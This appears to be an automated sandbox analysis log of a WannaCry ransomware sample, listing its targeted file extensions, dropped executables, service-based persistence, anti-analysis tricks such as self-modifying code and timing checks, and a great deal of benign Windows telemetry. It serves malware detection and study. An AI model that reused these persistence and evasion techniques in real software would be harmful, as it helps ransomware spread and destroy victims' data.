              Source: mssecsvc.exe, 00000004.00000000.263749691.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.663555779.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000000.272335422.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000002.357943271.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000B.00000000.278856067.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000B.00000002.384640585.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
              Source: mssecsvc.exe | String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StarterEdition-wrapper~3
              Source: mssecsvc.exe | String found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04392\avg-secure-search-installer.exe
              Source: mssecsvc.exe | String found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04160\avg-secure-search-installer.exe
              Source: mssecsvc.exe | String found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a01924\avg-secure-search-installer.exe2
              Source: mssecsvc.exe | String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-2-Pa
              Source: mssecsvc.exe | String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientUltimate~31bf385
              Source: mssecsvc.exe | String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-Pack
              Source: mssecsvc.exe | String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAUE-Pack
              Source: mssecsvc.exe | String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-Customization-Packa
              Source: C:\Windows\mssecsvc.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\mssecsvc.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\mssecsvc.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\mssecsvc.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\backgroundTaskHost.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\backgroundTaskHost.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: FjYNZSPNkt.dll | Static file information: File size 5267459 > 1048576
              Source: FjYNZSPNkt.dll | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x501000
              Source: C:\Windows\tasksche.exe | Code function: 29_2_00407710 push eax; ret 29_2_0040773E
              Source: C:\Windows\tasksche.exe | Code function: 29_2_004076C8 push eax; ret 29_2_004076E6
              Source: mssecsvc.exe.2.dr | Static PE information: section name: hzuevao
              Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B93D36 LoadLibraryA,GetProcAddress,LoadLibraryA,GetTickCount,GetVolumeInformationA,GetModuleFileNameA,wsprintfA,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateEventA,socket,connect,GetVersionExA,wsprintfA,CreateThread,CloseHandle,GetTickCount, 4_2_00B93D36

              Persistence and Installation Behavior

              Source: C:\Windows\mssecsvc.exe | Executable created and started: C:\WINDOWS\tasksche.exe
              Source: C:\Windows\SysWOW64\rundll32.exe | Executable created and started: C:\WINDOWS\mssecsvc.exe
              Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\mssecsvc.exe
              Source: C:\Windows\mssecsvc.exe | File created: C:\Windows\tasksche.exe
              Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\mssecsvc.exe
              Source: C:\Windows\mssecsvc.exe | File created: C:\Windows\tasksche.exe
              Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle, 4_2_00407C40
              Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\mssecsvc.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\mssecsvc.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\mssecsvc.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\mssecsvc.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\backgroundTaskHost.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\backgroundTaskHost.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\mssecsvc.exe | Evasive API call chain: GetSystemTime,DecisionNodes,Sleep graph_11-2539
              Source: C:\Windows\mssecsvc.exe | Special instruction interceptor: First address: 0000000000A718B2 instructions caused by: Self-modifying code
              Source: C:\Windows\mssecsvc.exe | Special instruction interceptor: First address: 0000000000A6B1E4 instructions caused by: Self-modifying code
              Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B94178 4_2_00B94178
              Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA4178 4_2_7FEA4178
              Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A84178 11_2_00A84178
              Source: C:\Windows\System32\svchost.exe TID: 480 | Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 468 | Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\mssecsvc.exe | Evasive API call chain: GetSystemTime,DecisionNodes graph_11-2539
              Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B9042D rdtsc 4_2_00B9042D
              Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
              Source: C:\Windows\mssecsvc.exe | API coverage: 10.0 %
              Source: C:\Windows\mssecsvc.exe | Code function: 11_2_00A84178 11_2_00A84178
              Source: C:\Windows\mssecsvc.exe | Process information queried: ProcessInformation
              Source: C:\Windows\System32\loaddll32.exe | Thread delayed: delay time: 120000
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: &@vmicvss
              Source: backgroundTaskHost.exe, 00000024.00000000.543434763.000001D426613000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 6post:https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425106554&TID=700342084&CID=128000000001392709&BID=1423522069&PG=PC000P0FR5.0000000IQ8&TPID=425106554&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ASID={ASID}&TIME={DATETIME}&SLOT=1&REQT=20220720T155055&MA_Score=2&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=dd1a8e84fd1343a98117c17a02a03b24&BCNT=1&PG=PC000P0FR5.0000000IQ8&UNID=314559&MAP_TID=F45BD19D-6B8E-42A3-8BE3-7AB3D0A2D2E6&NCT=1&PN=DA63DF93-3DBC-42AE-A505-B34988683AC7&ASID=BEEDE8C6B3A34585A9CD2D88614A35DA&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ARC=1&EMS=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=84.17.52.2&OPTOUTSTATE=256&HTTPS=1&PRODID=00000000-0000-0000-0000-000000000000&DVTP=2&DEVOSVER=10.0.17134.1&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=17134&DEVOSMINBLD=1&LOD=1118&LOH=24&LO=1611218&RAFB=0&MARKETBASEDCOUNTRY=US&CLR=CDM&CFMT=TEXT%2CIMAGE&SFT=JPEG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACHE_DS=50583&CACHE_FS=32089&CACHE_SC=6&WPX=1&HPX=1&TIME=20220720T155045Z&PL=EN-US&CTMODE=MULTISESSION&ARCH=X64&CDMVER=10.0.17134.1&DEVFAM=WINDOWS.DESKTOP&DEVFORM=UNKNOWN&DISPHORZRES=1280&DISPSIZE=17.1&DISPVERTRES=1024&ISU=0&METERED=FALSE&NETTYPE=ETHERNET&NPID=SC-314559&OEMNAME=VMWARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFDwI
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@vmicheartbeat
              Source: svchost.exe, 00000021.00000002.817775099.00000247D36C5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@Allow inbound TCP port 636 traffic for vmicheartbeatLMEMp
              Source: backgroundTaskHost.exe, 00000024.00000003.521646632.000001D426635000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: api.iris.microsoft.com/v1/a/{ACTION}?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=62f7fc83080b4ea4bc961e27c15af7da&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&bSrc=i.t&time={DATETIME}&asid={ASID}&eid={EID}"}]},"class":"content","items":DMVER=10.0.17134.1&DEVFAM=WINDOWS.DESKTOP&DEVFORM=UNKNOWN&DISPHORZRES=1280&DISPSIZE=17.1&DISPVERTRES=1024&ISU=0&METERED=FALSE&NETTYPE=ETHERNET&NPID=SC-314559&OEMNAME=VMWARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFD":[{\"appPackageFamilyName\":\"ROBLOXCorporation.ROBLOX_55nm5eh3cm0pr\",\"entityId\":\"B_9NBLGGGZM6WM\",\"skuId\":\"0010\",\"productId\":\"9NBLGGGZM6WM\",\"applicationId\":\"ROBLOXCorporation.ROBLOX_55nm5eh3cm0pr!App\",\"options\":4,\"packageRelativeAppId\":\"App\",\"properties\":{\"storeCampaignId\":{\"text\":\"msft_1\"},\"installApp\":{\"bool\":false},\"installDelay\":{\"text\":\"medium\"},\"swapStartTile\":{\"event\":\"pin\",\"parameters\":{},\"action\":\"swapStartTile\"},\"displayName\":{\"text\":\"Roblox\"},\"phoneticName\":{\"text\":\"Roblox\"},\"packageSize\":{\"number\":143466514.0},\"launchStore\":{\"event\":\"clic
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: "@Block any inbound traffic for vmicvss
              Source: mssecsvc.exe | Binary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Common-Drivers-Package~3
              Source: mssecsvc.exe, 00000004.00000000.263749691.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.663555779.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000000.272335422.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000002.357943271.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000B.00000000.278856067.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000B.00000002.384640585.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: svchost.exe, 00000021.00000002.817775099.00000247D36C5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@Allow outbound TCP traffic for vmicheartbeatLMEM`
              Source: mssecsvc.exe, 00000006.00000002.361347885.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, mssecsvc.exe, 00000006.00000002.361889160.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.315005780.0000021C08828000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.311930287.0000021C08828000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.795555976.0000021C08828000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.681887539.000001FF10C57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.679528785.000001FF0B429000.00000004.00000020.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.388870583.0000019B7D338000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.353158659.0000019B7D325000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000002.542897680.0000019B7D338000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: dwm.exe, 0000001B.00000002.813088603.000002C6305D0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
              Source: backgroundTaskHost.exe, 00000024.00000003.562504340.000001D426635000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=62f7fc83080b4ea4bc961e27c15af7da&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&bSrc=i.t&time={DATETIME}&asid={ASID}&eid={EID}"}]},"class":"content","items":EG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACHE_DS=50583&CACHE_FS=32089&CACHE_SC=6&WPX=1&HPX=1&TIME=20220720T155045Z&PL=EN-US&CTMODE=MULTISESSION&ARCH=X64&CDMVER=10.0.17134.1&DEVFAM=WINDOWS.DESKTOP&DEVFORM=UNKNOWN&DISPHORZRES=1280&DISPSIZE=17.1&DISPVERTRES=1024&ISU=0&METERED=FALSE&NETTYPE=ETHERNET&NPID=SC-314559&OEMNAME=VMWARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFD","reuseCount":-1,"requiresNetwork":0,"expireTime":"2023-07-20T15:50:55","rotationPeriod":31536000}\"event\":\"pin\",\"parameters\":{},\"action\":\"swapStartTile\"},\"displayName\":{\"text\":\"Roblox\"},\"phoneticName\":{\"text\":\"Roblox\"},\"packageSize\":{\"number\":143466514.0},\"launchStore\":{\"event\":\"click\",\"parameters\":{\"uri\":\"ms-windows-store://pdp/?productid=9nblgggzm6wm&ocid=ems.dco.startprogrammable&ccid=62f7fc8
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ng-MPSS$@vmicheartbeat-allow-in-1nOnly
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@vmicvss
              Source: backgroundTaskHost.exe, 00000024.00000000.543434763.000001D426613000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {"itemPropertyManifest":{"storeCampaignId":{"type":"text","isOptional":true},"installApp":{"type":"boolean"},"installDelay":{"type":"text"},"swapStartTile":{"type":"action"},"displayName":{"type":"text"},"phoneticName":{"type":"text"},"packageSize":{"type":"numeric"},"launchStore":{"type":"action"},"onRender":{"type":"action"},"showNameOnMediumTile":{"type":"boolean"},"showNameOnWideTile":{"type":"boolean"},"showNameOnLargeTile":{"type":"boolean"},"smallTile":{"type":"image"},"collection":{"type":"numeric"},"mediumTile":{"type":"image"},"backgroundColor":{"type":"text"}},"propertyManifest":{},"properties":{},"tracking":{"events":[{"id":"impression"}],"parameterized":[{"uri":"https://ris.api.iris.microsoft.com/v1/a/{ACTION}?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=62f7fc83080b4ea4bc961e27c15af7da&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&bSrc=i.t&time={DATETIME}&asid={ASID}&eid={EID}"}]},"class":"content","items":EG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACHE_DS=50583&CACHE_FS=32089&CACHE_SC=6&WPX=1&HPX=1&TIME=20220720T155045Z&PL=EN-US&CTMODE=MULTISESSION&ARCH=X64&CDMVER=10.0.17134.1&DEVFAM=WINDOWS.DESKTOP&DEVFORM=UNKNOWN&DISPHORZRES=1280&DISPSIZE=17.1&DISPVERTRES=1024&ISU=0&METERED=FALSE&NETTYPE=ETHERNET&NPID=SC-314559&OEMNAME=VMWARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFD","reuseCount":-1,"requiresNetwork":0,"expireTime":"2023-07-20T15:50:55","rotationPeriod":31536000}\"event\":\"pin\",\"parameters\":{},\"action\":\"swapStartTile\"},\"displayName\":{\"text\":\"Roblox\"},\"phoneticName\":{\"text\":\"
Roblox\"},\"packageSize\":{\"number\":143466514.0},\"launchStore\":{\"event\":\"click\",\"parameters\":{\"uri\":\"ms-windows-store://pdp/?productid=9nblgggzm6wm&ocid=ems.dco.startprogrammable&ccid=62f7fc8
              Source: svchost.exe, 00000021.00000002.817775099.00000247D36C5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@Allow inbound TCP port 389 traffic for vmicheartbeatLMEMp
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: "@vmicheartbeat
              Source: svchost.exe, 00000023.00000002.800948618.000002418A629000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000_0r
              Source: mssecsvc.exe, 00000004.00000000.263749691.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.663555779.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000000.272335422.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000002.357943271.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000B.00000000.278856067.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000B.00000002.384640585.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Common-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catp
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: W$N.@vmicheartbeat-block-out
              Source: backgroundTaskHost.exe, 00000024.00000003.544877796.000001D426A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFD\",\"reuseCount\":-1,\"requiresNetwork\":0,\"expireTime\":\"2023-07-20T15:50:55\",\"rotationPeriod\":31536000}}"}],"refreshtime":"2022-07-27T15:50:55"}}
              Source: svchost.exe, 00000010.00000000.306971509.0000025CB586C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmicshutdown
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: .@Block any other inbound traffic for vmicheartbeat
              Source: svchost.exe, 00000021.00000002.817775099.00000247D36C5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@Allow outbound TCP traffic for vmicheartbeatLMEM`0~l
              Source: svchost.exe, 00000010.00000000.306971509.0000025CB586C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmicvss
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $@vmicshutdown
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@vmicshutdown-block-out
              Source: backgroundTaskHost.exe, 00000024.00000000.467119785.000001D4240CE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: post:https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425106558&TID=700342085&CID=128000000001392729&BID=230696396&PG=PC000P0FR5.0000000IQ8&TPID=425106558&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ASID={ASID}&TIME={DATETIME}&SLOT=2&REQT=20220720T155055&MA_Score=2&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=62f7fc83080b4ea4bc961e27c15af7da&BCNT=1&PG=PC000P0FR5.0000000IQ8&UNID=314559&MAP_TID=F45BD19D-6B8E-42A3-8BE3-7AB3D0A2D2E6&NCT=1&PN=DA63DF93-3DBC-42AE-A505-B34988683AC7&ASID=BEEDE8C6B3A34585A9CD2D88614A35DA&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ARC=1&EMS=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=84.17.52.2&OPTOUTSTATE=256&HTTPS=1&PRODID=00000000-0000-0000-0000-000000000000&DVTP=2&DEVOSVER=10.0.17134.1&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=17134&DEVOSMINBLD=1&LOD=1118&LOH=24&LO=1611218&RAFB=0&MARKETBASEDCOUNTRY=US&CLR=CDM&CFMT=TEXT%2CIMAGE&SFT=JPEG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACHE_DS=50583&CACHE_FS=32089&CACHE_SC=6&WPX=1&HPX=1&TIME=20220720T155045Z&PL=EN-US&CTMODE=MULTISESSION&ARCH=X64&CDMVER=10.0.17134.1&DEVFAM=WINDOWS.DESKTOP&DEVFORM=UNKNOWN&DISPHORZRES=1280&DISPSIZE=17.1&DISPVERTRES=1024&ISU=0&METERED=FALSE&NETTYPE=ETHERNET&NPID=SC-314559&OEMNAME=VMWARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFD
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *@vmicheartbeat-block-in
              Source: backgroundTaskHost.exe, 00000024.00000000.523479263.000001D4267A6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {"_id":"B_9NBLGGGZM6WM_9WZDNCRFHWD2_9NH2GPH4JZS4_9NBLGGH6J6VK_9P6RC76MSMMJ_9WZDNCRFJ27N_9N0866FS04W8_9WZDNCRFJ10M_9WZDNCRFJ140_9NC2FBTHCJV8_9NBLGGH1CQ7L","startTime":"2019-05-25T00:30:00","_imp":"post:https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425106558&TID=700342085&CID=128000000001392729&BID=230696396&PG=PC000P0FR5.0000000IQ8&TPID=425106558&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ASID={ASID}&TIME={DATETIME}&SLOT=2&REQT=20220720T155055&MA_Score=2&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=62f7fc83080b4ea4bc961e27c15af7da&BCNT=1&PG=PC000P0FR5.0000000IQ8&UNID=314559&MAP_TID=F45BD19D-6B8E-42A3-8BE3-7AB3D0A2D2E6&NCT=1&PN=DA63DF93-3DBC-42AE-A505-B34988683AC7&ASID=BEEDE8C6B3A34585A9CD2D88614A35DA&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ARC=1&EMS=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=84.17.52.2&OPTOUTSTATE=256&HTTPS=1&PRODID=00000000-0000-0000-0000-000000000000&DVTP=2&DEVOSVER=10.0.17134.1&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=17134&DEVOSMINBLD=1&LOD=1118&LOH=24&LO=1611218&RAFB=0&MARKETBASEDCOUNTRY=US&CLR=CDM&CFMT=TEXT%2CIMAGE&SFT=JPEG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACHE_DS=50583&CACHE_FS=32089&CACHE_SC=6&WPX=1&HPX=1&TIME=20220720T155045Z&PL=EN-US&CTMODE=MULTISESSION&ARCH=X64&CDMVER=10.0.17134.1&DEVFAM=WINDOWS.DESKTOP&DEVFORM=UNKNOWN&DISPHORZRES=1280&DISPSIZE=17.1&DISPVERTRES=1024&ISU=0&METERED=FALSE&NETTYPE=ETHERNET&NPID=SC-314559&OEMNAME=VMWARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFD","reuseCount":-1,"requiresNetwork":0,"expireTime":"2023-07-20T15:50:55","rotationPeriod":31536000}"
              Source: svchost.exe, 0000001A.00000002.793791069.000001B8BFC49000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicheartbeat-allow-out
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@Allow inbound TCP port 389 traffic for vmicheartbeat
